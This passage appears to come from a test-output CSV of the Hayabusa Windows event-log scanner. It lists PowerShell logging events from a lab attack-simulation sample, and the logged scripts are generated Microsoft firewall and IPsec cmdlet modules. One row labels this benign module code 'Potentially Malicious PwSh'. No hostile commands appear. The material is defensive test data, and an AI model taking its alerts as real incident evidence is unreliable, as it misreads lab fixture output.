$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.473 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 